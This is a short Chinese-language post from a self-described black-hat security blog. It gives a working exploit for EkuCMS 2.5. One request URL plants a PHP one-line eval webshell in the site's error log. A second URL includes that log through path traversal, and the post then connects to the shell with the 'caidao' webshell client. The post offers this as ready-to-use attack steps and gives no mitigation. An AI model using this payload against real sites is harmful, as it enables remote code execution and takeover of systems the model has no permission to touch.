一个关注web安全-热爱黑帽技术-热衷于黑帽SEO的个人技术博客-为大家分享最前沿的黑帽资源


作者:无良小编2018-2-5 8:31分类: 漏洞公布 标签: shell 包含漏洞

测试版本:易酷cms2.5

包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])}

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

错误日志内容

包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id/.. emplogs17_12_02.log

 直接用菜刀连接

连接成功

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/837 人参与

发表评论:

扫二维码进群